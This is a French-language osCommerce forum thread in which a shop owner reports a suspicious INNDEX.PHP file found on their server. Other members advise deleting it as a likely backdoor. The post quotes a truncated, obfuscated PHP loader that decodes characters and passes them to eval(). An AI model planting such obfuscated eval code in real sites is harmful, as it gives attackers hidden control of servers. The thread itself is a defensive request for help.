Forum osCommerce-fr > page php INNDEX.PHP avec code bizard HELP

Version complète : page php INNDEX.PHP avec code bizard HELP

Forum osCommerce-fr > Adapter OsCommerce MS2 > Sécurité - Mises à jour

cebb

11 May 2012, 13:33

Bonjour à tous,
je viens de découvrir sur mon serveur une page INNDEX.PHP tres tres tres bizard ,

voici le code de la page :

Code

<?php for($o=0,$e='&\'()*+,-.:]^_`{|,,,|

BLA BLA BLA

se{$d.=@chr(($h[$e[$o]]<<4)+($h[$e[++$o]]));}}eval($d); ?>

merci d'avance pour votre soutiens et votre aide.

Bonbec

11 May 2012, 13:42

Bonjour,

1) ce n'est pas la peine de copier tout ce code, çà va inspirer des personnes qui s'ennuient

2) cette section du forum a plusieurs fils du même type, tu y trouvera des solutions
3) j'espère que tu avais appliqué les différents conseils de base pour protéger ton site ? Sinon çà va recommencer plus vite que tu ne pourras retirer le ou les codes malicieux ...

cebb

11 May 2012, 13:45

yes en effet j'ai pas pensé à ca .
oui le site est bien protégé normalement .
mais la je beug..

ca a quel incidence a votre avis ??

Gnidhal

7 Jun 2012, 18:01

Bonjour, Bonbec t'a déjà répondu, dans ce forum les causes, risques et solutions ont déjà été évoqués.
Code à virer d'urgence, cela contient généralement une backdoor (que le pirate récupère sur son site) et/ou un script de duplication pour pourrir le reste de ton site.

ngmsky

8 Jul 2012, 17:09

Bonjour,
Ma question consistait à savoir comment detectez-vous les nouvelles pages/codes ajoutées dans votre son site, mais veuillez ne pas considérer ce post car j'ai preferé créer un autre sujet à part.
Désolé.

lien du sujet, au cas où ça intéresserait quelqu'un : http://www.oscommerce-fr.info/forum/index....showtopic=70061

Ceci est une version "bas débit" de notre forum. Pour voir la version complète avec plus d'informations, la mise en page et les images, veuillez cliquer ici.